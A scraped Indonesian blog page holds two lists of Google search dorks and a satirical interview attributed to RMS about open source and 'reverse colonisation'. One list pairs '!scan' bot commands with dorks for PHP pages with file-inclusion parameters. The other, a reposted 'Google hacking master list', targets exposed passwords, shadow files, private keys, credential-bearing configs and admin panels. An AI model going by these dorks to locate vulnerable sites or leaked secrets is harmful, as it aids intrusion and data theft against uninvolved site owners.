allinurl:".php?mod=" !scan module.php?mod= allinurl:"module.php?mod=" !scan module.php?mod= allinurl:".php?mod=" !scan /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= allinurl:"PostGuestbook" !scan /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= inurl:"PostGuestbook" !scan /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= inurl:"PostGuestbook 0.6.1" !scan /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= "PostGuestbook" !scan /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= PostGuestbook !scan /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= PostGuestbook 0.6.1 !scan modul.php?mod= allinurl:"modul.php?mod=" !scan modul.php?mod= allinurl:".php?mod=" !scan more.php?sub= "more.php?sub=" !scan more.php?sub= more.php?sub= !scan nav.php?g= "nav.php?g=" !scan nav.php?g= nav.php?g= !scan nav.php?go= "nav.php?go=" !scan nav.php?go= nav.php?go= !scan nav.php?lk= allinurl:".php?lk=" !scan nav.php?ln= allinurl:.php?ln= !scan nav.php?loc= nav.php !scan nav.php?loc= nav.php?loc= !scan nav.php?loc= .php?loc= !scan nav.php?nav= "nav.php?nav=" !scan nav.php?nav= nav.php?nav= !scan nav.php?page= "nav.php?page=" !scan nav.php?page= nav.php?page= !scan nav.php?pagina= "nav.php?pagina=" !scan template.php?sekce= !scan down*.php?goFile= !scan blank.php?header= !scan start.php?body= !scan standard.php?body= !scan base.php?path= !scan base.php?module= !scan default.php?l= !scan principal.php?strona= !scan info.php?l= !scan template.php?left= !scan index2.php?texto= !scan home.php?eval= !scan padrao.php?section= !scan blank.php?goFile= !scan head.php?loc= !scan index.php?index= !scan page.php?ir= !scan print.php?path= !scan layout.php?ir= !scan blank.php?pollname= !scan down*.php?path= !scan include.php?x= !scan sitio.php?opcion= !scan pagina.php?category= !scan start.php?pageweb= !scan gallery.php?rub= !scan template.php?sp= !scan sub*.php?basepath= !scan press.php?menu= !scan standard.php?section= !scan enter.php?abre= !scan index2.php?pref= !scan index1.php?pa= !scan sitio.php?incl= !scan principal.php?seite= !scan show.php?ki= !scan gallery.php?chapter= !scan nota.php?qry= !scan pagina.php?pagina= !scan index3.php?x= !scan default.php?menu= !scan page.php?strona= !scan *inc*.php?open= !scan index3.php?secao= !scan standard.php?*[*]*= !scan default.php?abre= !scan template.php?basepath= !scan standard.php?goFile= !scan index2.php?ir= !scan file.php?modo= !scan gallery.php?itemnav= !scan main.php?oldal= !scan press.php?pg= !scan down*.php?showpage= !scan start.php?nivel= !scan start.php?destino= !scan index1.php?filepath= !scan blank.php?rub= !scan path.php?ir= !scan layout.php?var= !scan padrao.php?op= !scan mod*.php?pre= !scan index1.php?texto= !scan start.php?pg= !scan default.php?pa= !scan press.php?strona= !scan nota.php?cmd= !scan index1.php?showpage= !scan info.php?go= !scan standard.php?abre= !scan general.php?seccion= !scan index1.php?itemnav= !scan layout.php?seite= !scan path.php?load= !scan home.php?pollname= !scan path.php?left= !scan down*.php?inc= !scan index3.php?abre= !scan blank.php?where= !scan info.php?start= !scan include.php?channel= !scan print.php?dir= !scan pag
Read More..
Diposting oleh
Jericho PS
Label:
SQLi,
SQLi dork
Kamis, 02 April 2009
di
03.59
|
PENJAJAHAN TERBALIK BERNARIDHO I. HUTABARAT (Business Intelligence Expert)
Alkisah, RMS membaca tulisan saya “A Program is NOT like a recipe”. Kami bertemu empat mata dalam suatu kesempatan dan saya memakai kesempatan untuk mewawancarai orang yang sangat terkenal ini.
SAYA SEPERTI orang berkepribadian ganda. Anti-Barat, tapi memakai produk dari Barat: jeans, Yahoo!, Google, Linux, dan mempropagandakan open source (yang notabene produk Barat). Berikut adalah petikan wawancaranya: BIH: Selamat pagi, senang bertemu Anda. RMS: Selamat pagi. Saya membaca tulisan Anda dan saya pikir tulisan tersebut tidak istimewa. BIH: Tidak apa-apa. Tapi, bagaimana kalau kita bicara hal yang lain saja? RMS: Okay. Saya dengar Anda beberapa kali berbicara tentang “Pintu gerbang kemerdekaan”. Apakah Anda merasa kami, orang-orang Barat sebagai penjajah? BIH: Ya. RMS: Analisis Anda dangkal. Tidakkah Anda lihat bahwa sudah terjadi penjajahan terbalik? BIH: Penjajahan terbalik? RMS: Ya. Penjajahan oleh negara berkembang terhadap negaranegara maju. BIH: Persisnya? RMS: Itu terjadi dalam bidang software. Kami bekerja keras untuk membuat Linux, banyak opened source-code software, dan memberikannya secara gratis. Negara-negara berkembang (dan melakukan pelanggaran HAM) seperti Nigeria dan China, menikmati hasilnya. Toh, rasa antipati masyarakat umum di negara-negara tersebut terhadap Barat dan Amerika tetap tinggi. BIH : Mengapa disebut penjajahan? RMS: Pada penjajahan, pihak yang dijajah bekerja keras sementara pihak penjajah ongkang-ongkang kaki menerima hasilnya. Negara Barat membuat dan memperbaiki Linux, tetapi masyarakat negara berkembang tinggal menikmati hasil kerja tersebut. BIH : Hmmm, benar. RMS: Banyak orang di negara berkembang tidak menyadari kelelahan dalam membuat, mendebat, dan memaparkan spesifi kasi. Banyak orang di negara berkembang tidak merasakan sakitnya menguji compliance suatu produk terhadap spesifi kasi. Mereka cuma menjadi pemimpin komunitas dan kolumnis seperti Anda, tapi tak membuat produk apapun. BIH : Tapi, bukankah Anda dan banyak programer lain menikmati pekerjaan yang painful dan “unpaid” tersebut? RMS: Ya (mengeluh nafas panjang), sayangnya begitu. Kadangkadang manusia menikmati hal yang menyakitkan. BIH : Itu suatu penyakit psikologis? RMS: Saya tidak mau sebut demikian dan please jangan dibahas. BIH : Apa yang Anda dan orang-orang Barat harus lakukan? RMS: Kami, orang-orang Amerika, Jepang, dan Eropa harus membangun jatidiri dan menghilangkan rasa bersalah berlebihan atas penjajahan di masa lalu. Penjajahan/tirani bisa (dan) dilakukan tidak hanya oleh Barat, tetapi juga oleh Timur. Jepang dan Malaysia adalah negara Timur. Jepang penjajah ekonomi dan Malaysia bersifat tiran. Penjajah tidak selalu orang Barat. BIH : Ada contoh lain? RMS: OPEC. Kebanyakan negara OPEC bukan negara Barat, dan mereka suka mengkritik Barat dan AS. Tapi dalam hal software; secara praktis mereka boleh dikatakan tidak menyumbang apapun untuk kemajuan umat manusia di seluruh dunia. Mereka cuma mau enaknya memakai free software. Bill Gates menyumbang ke banyak orang tanpa memandang ras, agama, dan kebangsaan. Tapi, banyak individu kaya dari OPEC tidak berbuat hal yang sama. BIH : Bagaimana perasaan Anda tentang sikap anti-Amerika? RMS: Saya sedih dan marah membaca penilaian yang tidak adil terhadap Amerika. Saya yang memperjuangkan free software adalah warga Amerika. Free Software Foundation berkantor di Amerika, tapi membuat free software untuk dipakai manusia di seluruh dunia. Kalau mereka anti-Amerika berarti mereka juga antisaya. BIH : Pesan terakhir? RMS: Lebih mudah menghadapi Anda yang terus terang mengkritik Linux daripada menghadapi pendukung free software, tetapi diam-diam anti-Barat. BIH : Mr. Stallman, thank you.
Read More..
Diposting oleh
Jericho PS
Label:
AS,
Linux,
penjajahan
Senin, 30 Maret 2009
di
05.13
|
Lagi browsing -browsing dapet di website http://it.toolbox.com/blogs/managing-infosec/google-hacking-master-list-28302
Code:
admin account info" filetype:log !Host=*.* intext:enc_UserPassword=* ext:pcf "# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd "AutoCreate=TRUE password=*" "http://*:*@www" domainname "index of/" "ws_ftp.ini" "parent directory" "liveice configuration file" ext:cfg -site:sourceforge.net "parent directory" +proftpdpasswd Duclassified" -site:duware.com "DUware All Rights reserved" duclassmate" -site:duware.com Dudirectory" -site:duware.com dudownload" -site:duware.com Elite Forum Version *.*" Link Department" "sets mode: +k" "your password is" filetype:log DUpaypal" -site:duware.com allinurl: admin mdb auth_user_file.txt config.php eggdrop filetype:user user enable password | secret "current configuration" -intext:the etc (index.of) ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd" database | server | dsn ext:inc "pwd=" "UID=" ext:ini eudora.ini ext:ini Version=4.0.0.4 password ext:passwd -intext:the -sample -example ext:txt inurl:unattend.txt ext:yml database inurl:config filetype:bak createobject sa filetype:bak inurl:"htaccess|passwd|shadow|htusers" filetype:cfg mrtg "target filetype:cfm "cfapplication name" password filetype:conf oekakibbs filetype:conf slapd.conf filetype:config config intext:appSettings "User ID" filetype:dat "password.dat" filetype:dat inurl:Sites.dat filetype:dat wand.dat filetype:inc dbconn filetype:inc intext:mysql_connect filetype:inc mysql_connect OR mysql_pconnect filetype:inf sysprep filetype:ini inurl:"serv-u.ini" filetype:ini inurl:flashFXP.ini filetype:ini ServUDaemon filetype:ini wcx_ftp filetype:ini ws_ftp pwd filetype:ldb admin filetype:log "See `ipsec --copyright" filetype:log inurl:"password.log" filetype:mdb inurl:users.mdb filetype:mdb wwforum filetype:netrc password filetype:pass pass intext:userid filetype:pem intext:private filetype:properties inurl:db intext:password filetype:pwd service filetype:pwl pwl filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword" filetype:reg reg +intext:â? WINVNC3â? filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS filetype:sql "insert into" (pass|passwd|password) filetype:sql ("values * MD5" | "values * password" | "values * encrypt") filetype:sql +"IDENTIFIED BY" -cvs filetype:sql password filetype:url +inurl:"ftp://" +inurl:";@" filetype:xls username password email htpasswd htpasswd / htgroup htpasswd / htpasswd.bak intext:"enable password 7" intext:"enable secret 5 $" intext:"EZGuestbook" intext:"Web Wiz Journal" intitle:"index of" intext:connect.inc intitle:"index of" intext:globals.inc intitle:"Index of" passwords modified intitle:"Index of" sc_serv.conf sc_serv content intitle:"phpinfo()" +"mysql.default_password" +"Zend s?ri?ting Language Engine" intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com intitle:index.of administrators.pwd intitle:Index.of etc shadow intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak" intitle:rapidshare intext:login inurl:"calendars?ri?t/users.txt" inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set" inurl:"GRC.DAT" intext:"password" inurl:"Sites.dat"+"PASS=" inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample inurl:"wvdial.conf" intext:"password" inurl:/db/main.mdb inurl:/wwwboard inurl:/yabb/Members/Admin.dat inurl:ccbill filetype:log inurl:cgi-bin inurl:calendar.cfg inurl:chap-secrets -cvs inurl:config.php dbuname dbpass inurl:filezilla.xml -cvs inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man inurl:nuke filetype:sql inurl:ospfd.conf intext:password -sample -test -tutorial -download inurl:pap-secrets -cvs inurl:pass.dat inurl:perform filetype:ini inurl:perform.ini filetype:ini inurl:secring ext:skr | ext:pgp | ext:bak inurl:server.cfg rcon password inurl:ventrilo_srv.ini adminpassword inurl:vtund.conf intext:pass -cvs inurl:zebra.conf intext:password -sample -test -tutorial -download LeapFTP intitle:"index.of./" sites.ini modified master.passwd mysql history files NickServ registration passwords passlist passlist.txt (a better way) passwd passwd / etc (reliable) people.lst psyBNC config files pwd.db server-dbs "intitle:index of" signin filetype:url spwd.db / passwd trillian.ini wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin [WFClient] Password= filetype:ica intitle:"remote assessment" OpenAanval Console intitle:opengroupware.org "resistance is obsolete" "Report Bugs" "Username" "password" "bp blog admin" intitle:login | intitle:admin -site:johnny.ihackstuff.com "Emergisoft web applications are a part of our" "Establishing a secure Integrated Lights Out session with" OR intitle:"Data Frame - Browser not HTTP 1.1 compatible" OR intitle:"HP Integrated Lights- "HostingAccelerator" intitle:"login" +"Username" -"news" -demo "iCONECT 4.1 :: Login" "IMail Server Web Messaging" intitle:login "inspanel" intitle:"login" -"cannot" "Login ID" -site:inspediumsoft.com "intitle:3300 Integrated Communications Platform" inurl:main.htm "Login - Sun Cobalt RaQ" "login prompt" inurl:GM.cgi "Login to Usermin" inurl:20000 "Microsoft CRM : Unsupported Browser Version" "OPENSRS Domain Management" inurl:manage.cgi "pcANYWHERE EXPRESS Java Client" "Please authenticate yourself to get access to the management interface" "please log in" "Please login with admin pass" -"leak" -sourceforge CuteNews" "2003..2005 CutePHP" DWMail" password intitle:dwmail Merak Mail Server Software" -.gov -.mil -.edu -site:merakmailserver.com Midmart Messageboard" "Administrator Login" Monster Top List" MTL numrange:200- UebiMiau" -site:sourceforge.net "site info for" "Enter Admin Password" "SquirrelMail version" "By the SquirrelMail development Team" "SysCP - login" "This is a restricted Access Server" "Javas?ri?t Not Enabled!"|"Messenger Express" -edu -ac "This section is for Administrators only. If you are an administrator then please" "ttawlogin.cgi/?action=" "VHCS Pro ver" -demo "VNC Desktop" inurl:5800 "Web-Based Management" "Please input password to login" -inurl:johnny.ihackstuff.com "WebExplorer Server - Login" "Welcome to WebExplorer Server" "WebSTAR Mail - Please Log In" "You have requested access to a restricted area of our website. Please authenticate yourself to continue." "You have requested to access the management functions" -.edu (intitle:"Please login - Forums UBB.threads")|(inurl:login.php "ubb") (intitle:"Please login - Forums WWWThreads")|(inurl:"wwwthreads/login.php")|(inurl:"wwwthreads/login.pl?Cat=") (intitle:"rymo Login")|(intext:"Welcome to rymo") -family (intitle:"WmSC e-Cart Administration")|(intitle:"WebMyStyle e-Cart Administration") (inurl:"ars/cgi-bin/arweb?O=0" | inurl:arweb.jsp) -site:remedy.com -site:mil 4images Administration Control Panel allintitle:"Welcome to the Cyclades" allinurl:"exchange/logon.asp" allinurl:wps/portal/ login ASP.login_aspx "ASP.NET_SessionId" CGI:IRC Login ext:cgi intitle:"control panel" "enter your owner password to continue!" ez Publish administration filetype:php inurl:"webeditor.php" filetype:pl "Download: SuSE Linux Openexchange Server CA" filetype:r2w r2w intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board" intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu intext:"Mail admins login here to administrate your domain." intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin intext:"Storage Management Server for" intitle:"Server Administration" intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE" inurl:"begin.html" -Fee intext:"vbulletin" inurl:admincp intitle:"*- HP WBEM Login" | "You are being prompted to provide login account information for *" | "Please provide the information requested and press intitle:"Admin Login" "admin login" "blogware" intitle:"Admin login" "Web Site Administration" "Copyright" intitle:"AlternC Desktop" intitle:"Athens Authentication Point" intitle:"b2evo > Login form" "Login form. You must log in! You will have to accept cookies in order to log in" -demo -site:b2evolution.net intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button to co intitle:"ColdFusion Administrator Login" intitle:"communigate pro * *" intitle:"entrance" intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo intitle:"Dell Remote Access Controller" intitle:"Docutek ERes - Admin Login" -edu intitle:"Employee Intranet Login" intitle:"eMule *" intitle:"- Web Control Panel" intext:"Web Control Panel" "Enter your password here." intitle:"ePowerSwitch Login" intitle:"eXist Database Administration" -demo intitle:"EXTRANET * - Identification" intitle:"EXTRANET login" -.edu -.mil -.gov intitle:"EZPartner" -netpond intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists intitle:"i-secure v1.1" -edu intitle:"Icecast Administration Admin Page" intitle:"iDevAffiliate - admin" -demo intitle:"ISPMan : Unauthorized Access prohibited" intitle:"ITS System Information" "Please log on to the SAP System" intitle:"Kurant Corporation StoreSense" filetype:bok intitle:"ListMail Login" admin -demo intitle:"Login - Easy File Sharing Web Server" intitle:"Login Forum AnyBoard" intitle:"If you are a new user:" intext:"Forum AnyBoard" inurl:gochat -edu intitle:"Login to @Mail" (ext:pl | inurl:"index") -dwaffleman intitle:"Login to Cacti" intitle:"Login to the forums - @www.aimoo.com" inurl:login.cfm?id= intitle:"MailMan Login" intitle:"Member Login" "NOTE: Your browser must have cookies enabled in order to log into the site." ext:php OR ext:cgi intitle:"Merak Mail Server Web Administration" -ihackstuff.com intitle:"microsoft certificate services" inurl:certsrv intitle:"MikroTik RouterOS Managing Webpage" intitle:"MX Control Console" "If you can't remember" intitle:"Novell Web Services" "GroupWise" -inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf intitle:"Novell Web Services" intext:"Select a service and a language." intitle:"oMail-admin Administration - Login" -inurl:omnis.ch intitle:"OnLine Recruitment Program - Login" intitle:"Philex 0.2*" -s?ri?t -site:freelists.org intitle:"PHP Advanced Transfer" inurl:"login.php" intitle:"php icalendar administration" -site:sourceforge.net intitle:"php icalendar administration" -site:sourceforge.net intitle:"phpPgAdmin - Login" Language intitle:"PHProjekt - login" login password intitle:"please login" "your password is *" intitle:"Remote Desktop Web Connection" inurl:tsweb intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin - sfx_local" | intitle:"SFXAdmin - sfx_test" intitle:"SHOUTcast Administrator" inurl:admin.cgi intitle:"site administration: please log in" "site designed by emarketsouth" intitle:"Supero Doctor III" -inurl:supermicro intitle:"SuSE Linux Openexchange Server" "Please activate Javas?ri?t!" intitle:"teamspeak server-administration intitle:"Tomcat Server Administration" intitle:"TOPdesk ApplicationServer" intitle:"TUTOS Login" intitle:"TWIG Login" intitle:"vhost" intext:"vHost . 2000-2004" intitle:"Virtual Server Administration System" intitle:"VisNetic WebMail" inurl:"/mail/" intitle:"VitalQIP IP Management System" intitle:"VMware Management Interface:" inurl:"vmware/en/" intitle:"VNC viewer for Java" intitle:"web-cyradm"|"by Luc de Louw" "This is only for authorized users" -tar.gz -site:web-cyradm.org intitle:"WebLogic Server" intitle:"Console Login" inurl:console intitle:"Welcome Site/User Administrator" "Please select the language" -demos intitle:"Welcome to Mailtraq WebMail" intitle:"welcome to netware *" -site:novell.com intitle:"WorldClient" intext:"? (2003|2004) Alt-N Technologies." intitle:"xams 0.0.0..15 - Login" intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite inurl:admin intitle:"XMail Web Administration Interface" intext:Login intext:password intitle:"Zope Help System" inurl:HelpSys intitle:"ZyXEL Prestige Router" "Enter password" intitle:"inc. vpn 3000 concentrator" intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com intitle:asterisk.management.portal web-access intitle:endymion.sak?.mail.login.page | inurl:sake.servlet intitle:Group-Office "Enter your username and password to login" intitle:ilohamail " IlohaMail" intitle:ilohamail intext:"Version 0.8.10" " IlohaMail" intitle:IMP inurl:imp/index.php3 intitle:Login * Webmailer intitle:Login intext:"RT is ? Copyright" intitle:Node.List Win32.Version.3.11 intitle:Novell intitle:WebAccess "Copyright *-* Novell, Inc" intitle:open-xchange inurl:login.pl intitle:Ovislink inurl:private/login intitle:phpnews.login intitle:plesk inurl:login.php3 inurl:"/admin/configuration. php?" Mystore inurl:"/slxweb.dll/external?name=(custportal|webticketcust)" inurl:"1220/parse_xml.cgi?" inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS) inurl:":10000" intext:webmin inurl:"Activex/default.htm" "Demo" inurl:"calendar.asp?action=login" inurl:"default/login.php" intitle:"kerio" inurl:"gs/adminlogin.aspx" inurl:"php121login.php" inurl:"suse/login.pl" inurl:"typo3/index.php?u=" -demo inurl:"usysinfo?login=true" inurl:"utilities/TreeView.asp" inurl:"vsadmin/login" | inurl:"vsadmin/admin" inurl:.php|.asp
Code:
nurl:/admin/login.asp inurl:/cgi-bin/sqwebmail?noframes=1 inurl:/Citrix/Nfuse17/ inurl:/dana-na/auth/welcome.html inurl:/eprise/ inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:"Miva Merchant Administration Login" -inurl:cheap-malboro.net inurl:/modcp/ intext:Moderator+vBulletin inurl:/SUSAdmin intitle:"Microsoft Software upd?t? Services" inurl:/webedit.* intext:WebEdit Professional -html inurl:1810 "Oracle Enterprise Manager" inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com inurl::2082/frontend -demo inurl:administrator "welcome to mambo" inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0 inurl:cgi-bin/ultimatebb.cgi?ubb=login inurl:Citrix/MetaFrame/default/default.aspx inurl:confixx inurl:login|anmeldung inurl:coranto.cgi intitle:Login (Authorized Users Only) inurl:csCreatePro.cgi inurl:default.asp intitle:"WebCommander" inurl:exchweb/bin/auth/owalogon.asp inurl:gnatsweb.pl inurl:ids5web inurl:irc filetype:cgi cgi:irc inurl:login filetype:swf swf inurl:login.asp inurl:login.cfm inurl:login.php "SquirrelMail version" inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login" inurl:mewebmail inurl:names.nsf?opendatabase inurl:ocw_login_username inurl:orasso.wwsso_app_admin.ls_login inurl:postfixadmin intitle:"postfix admin" ext:php inurl:search/admin.php inurl:textpattern/index.php inurl:WCP_USER inurl:webmail./index.pl "Interface" inurl:webvpn.html "login" "Please enter your" Login (" Jetbox One CMS â?¢" | " Jetstream ? *") Novell NetWare intext:"netware management portal version" Outlook Web Access (a better way) PhotoPost PHP Upload PHPhotoalbum Statistics PHPhotoalbum Upload phpWebMail Please enter a valid password! inurl:polladmin
INDEXU Ultima Online loginservers W-Nailer Upload Area intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu "#mysql dump" filetype:sql "#mysql dump" filetype:sql 21232f297a57a5a743894a0e4a801fc3 "allow_call_time_pass_reference" "PATH_INFO" "Certificate Practice Statement" inurl:(PDF | DOC) "Generated by phpSystem" "generated by wwwstat" "Host Vulnerability Summary Report" "HTTP_FROM=googlebot" googlebot.com "Server_Software=" "Index of" / "chat/logs" "Installed Objects Scanner" inurl:default.asp "MacHTTP" filetype:log inurl:machttp.log "Mecury Version" "Infastructure Group" "Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log "Most Submitted Forms and s?ri?ts" "this section" "Network Vulnerability Assessment Report" "not for distribution" confidential "not for public release" -.edu -.gov -.mil "phone * * *" "address *" "e-mail" intitle:"curriculum vitae" "phpMyAdmin" "running on" inurl:"main.php" "produced by getstats" "Request Details" "Control Tree" "Server Variables" "robots.txt" "Disallow:" filetype:txt "Running in Child mode" "sets mode: +p" "sets mode: +s" "Thank you for your order" +receipt "This is a Shareaza Node" "This report was generated by WebLog" ( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject (intitle:"PRTG Traffic Grapher" inurl:"allsensors")|(intitle:"PRTG Traffic Grapher - Monitoring Results") (intitle:WebStatistica inurl:main.php) | (intitle:"WebSTATISTICA server") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob (inurl:"robot.txt" | inurl:"robots.txt" ) intext:disallow filetype:txt +":8080" +":3128" +":80" filetype:txt +"HSTSNR" -"netop.com" -site:php.net -"The PHP Group" inurl:source inurl:url ext:pHp 94FBR "ADOBE PHOTOSHOP" AIM buddy lists allinurl:/examples/jsp/snp/snoop.jsp allinurl:cdkey.txt allinurl:servlet/SnoopServlet cgiirc.conf cgiirc.conf contacts ext:wml data filetype:mdb -site:gov -site:mil exported email addresses ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:"budget approved") inurl:confidential ext:asp inurl:pathto.asp ext:ccm ccm -catacomb ext:CDX CDX ext:cgi inurl:editcgi.cgi inurl:file= ext:conf inurl:rsyncd.conf -cvs -man ext:conf NoCatAuth -cvs ext:dat bpk.dat ext:gho gho ext:ics ics ext:ini intext:env.ini ext:jbf jbf ext:ldif ldif ext:log "Software: Microsoft Internet Information Services *.*" ext:mdb inurl:*.mdb inurl:fpdb shop.mdb ext:nsf nsf -gov -mil ext:plist filetype:plist inurl:bookmarks.plist ext:pqi pqi -database ext:reg "username=*" putty ext:txt "Final encryption key" ext:txt inurl:dxdiag ext:vmdk vmdk ext:vmx vmx filetype:asp DBQ=" * Server.MapPath("*.mdb") filetype:bkf bkf filetype:blt "buddylist" filetype:blt blt +intext:screenname filetype:cfg auto_inst.cfg filetype:cnf inurl:_vti_pvt access.cnf filetype:conf inurl:firewall -intitle:cvs filetype:config web.config -CVS filetype:ctt Contact filetype:ctt ctt messenger filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To" filetype:fp3 fp3 filetype:fp5 fp5 -site:gov -site:mil -"cvs log" filetype:fp7 fp7 filetype:inf inurl:capolicy.inf filetype:lic lic intext:key filetype:log access.log -CVS filetype:log cron.log filetype:mbx mbx intext:Subject filetype:myd myd -CVS filetype:ns1 ns1 filetype:ora ora filetype:ora tnsnames filetype:pdb pdb backup (Pilot | Pluckerdb) filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net filetype:pot inurl:john.pot filetype:PS ps filetype:pst inurl:"outlook.pst" filetype:pst pst -from -to -date filetype:qbb qbb filetype:QBW qbw filetype:rdp rdp filetype:reg "Terminal Server Client" filetype:vcs vcs filetype:wab wab filetype:xls -site:gov inurl:contact filetype:xls inurl:"email.xls" Financial spreadsheets: finance.xls Financial spreadsheets: finances.xls Ganglia Cluster Reports haccess.ctl (one way) haccess.ctl (VERY reliable) ICQ chat logs, please... intext:"Session Start * * * *:*:* *" filetype:log intext:"Tobias Oetiker" "traffic analysis" intext:(password | passcode) intext:(username | userid | user) filetype:csv intext:gmail invite intext:http://gmail.google.com/gmail/a intext:SQLiteManager inurl:main.php intext:ViewCVS inurl:Settings.php intitle:"admin panel" +" RedKernel" intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html) intitle:"AppServ Open Project" -site:www.appservnetwork.com intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos" intitle:"Big Sister" +"OK Attention Trouble" intitle:"curriculum vitae" filetype:doc intitle:"edna:streaming mp3 server" -forums intitle:"FTP root at" intitle:"index of" +myd size intitle:"Index Of" -inurl:maillog maillog size intitle:"Index Of" cookies.txt size intitle:"index of" mysql.conf OR mysql_config intitle:"Index of" upload size parent directory intitle:"index.of *" admin news.asp configview.asp intitle:"index.of" .diz .nfo last modified intitle:"Joomla - Web Installer" intitle:"LOGREP - Log file reporting system" -site:itefix.no intitle:"Multimon UPS status page" intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php ) intitle:"PhpMyExplorer" inurl:"index.php" -cvs intitle:"statistics of" "advanced web statistics" intitle:"System Statistics" +"System and Network Information Center" intitle:"urchin (5|3|admin)" ext:cgi intitle:"Usage Statistics for" "Generated by Webalizer" intitle:"wbem" compaq login "Compaq Information Technologies Group" intitle:"Web Server Statistics for ****" intitle:"web server status" SSH Telnet intitle:"Welcome to F-Secure Policy Manager Server Welcome Page" intitle:"welcome.to.squeezebox" intitle:admin intitle:login intitle:Bookmarks inurl:bookmarks.html "Bookmarks intitle:index.of "Apache" "server at" intitle:index.of cleanup.log intitle:index.of dead.letter intitle:index.of inbox intitle:index.of inbox dbx intitle:index.of ws_ftp.ini intitle:intranet inurl:intranet +intext:"phone" inurl:"/axs/ax-admin.pl" -s?ri?t inurl:"/cricket/grapher.cgi" inurl:"bookmark.htm" inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM inurl:"newsletter/admin/" inurl:"newsletter/admin/" intitle:"newsletter admin" inurl:"putty.reg" inurl:"smb.conf" intext:"workgroup" filetype:conf conf inurl:*db filetype:mdb inurl:/cgi-bin/pass.txt inurl:/_layouts/settings inurl:admin filetype:xls inurl:admin intitle:login inurl:backup filetype:mdb inurl:build.err inurl:cgi-bin/printenv inurl:cgi-bin/testcgi.exe "Please distribute TestCGI" inurl:changepassword.asp inurl:ds.py inurl:email filetype:mdb inurl:fcgi-bin/echo inurl:forum filetype:mdb inurl:forward filetype:forward -cvs inurl:getmsg.html intitle:hotmail inurl:log.nsf -gov inurl:main.php phpMyAdmin inurl:main.php Welcome to phpMyAdmin inurl:netscape.hst inurl:netscape.hst inurl:netscape.ini inurl:odbc.ini ext:ini -cvs inurl:perl/printenv inurl:php.ini filetype:ini inurl:preferences.ini "[emule]" inurl:profiles filetype:mdb inurl:report "EVEREST Home Edition " inurl:server-info "Apache Server Information" inurl:server-status "apache" inurl:snitz_forums_2000.mdb inurl:ssl.conf filetype:conf inurl:tdbin inurl:vbstats.php "page generated" inurl:wp-mail.php + "There doesn't seem to be any new mail." inurl:XcCDONTS.asp ipsec.conf ipsec.secrets ipsec.secrets Lotus Domino address books mail filetype:csv -site:gov intext:name Microsoft Money Data Files mt-db-pass.cgi files MySQL tabledata dumps mystuff.xml - Trillian data files OWA Public Folders (direct view) Peoples MSN contact lists php-addressbook "This is the addressbook for *" -warning phpinfo() phpMyAdmin dumps phpMyAdmin dumps private key files (.csr) private key files (.key) Quicken data files rdbqds -site:.edu -site:.mil -site:.gov robots.txt site:edu admin grades site:www.mailinator.com inurl:ShowMail.do SQL data dumps Squid cache server reports Unreal IRCd WebLog Referrers Welcome to ntop! Fichier contenant des informations sur le r?seau : filetype:log intext:"ConnectionManager2" "apricot - admin" 00h "by Reimar Hoven. All Rights Reserved. Disclaimer" | inurl:"log/logdb.dta" "Network Host Assessment Report" "Internet Scanner" "Output produced by SysWatch *" "Phorum Admin" "Database Connection" inurl:forum inurl:admin phpOpenTracker" Statistics "powered | performed by Beyond Security's Automated Scanning" -kazaa -example "Shadow Security Scanner performed a vulnerability assessment" "SnortSnarf alert page" "The following report contains confidential information" vulnerability -search "The statistics were last upd?t?d" "Daily"-microsoft.com "this proxy is working fine!" "enter *" "URL***" * visit "This report lists" "identified by Internet Scanner" "Traffic Analysis for" "RMON Port * on unit 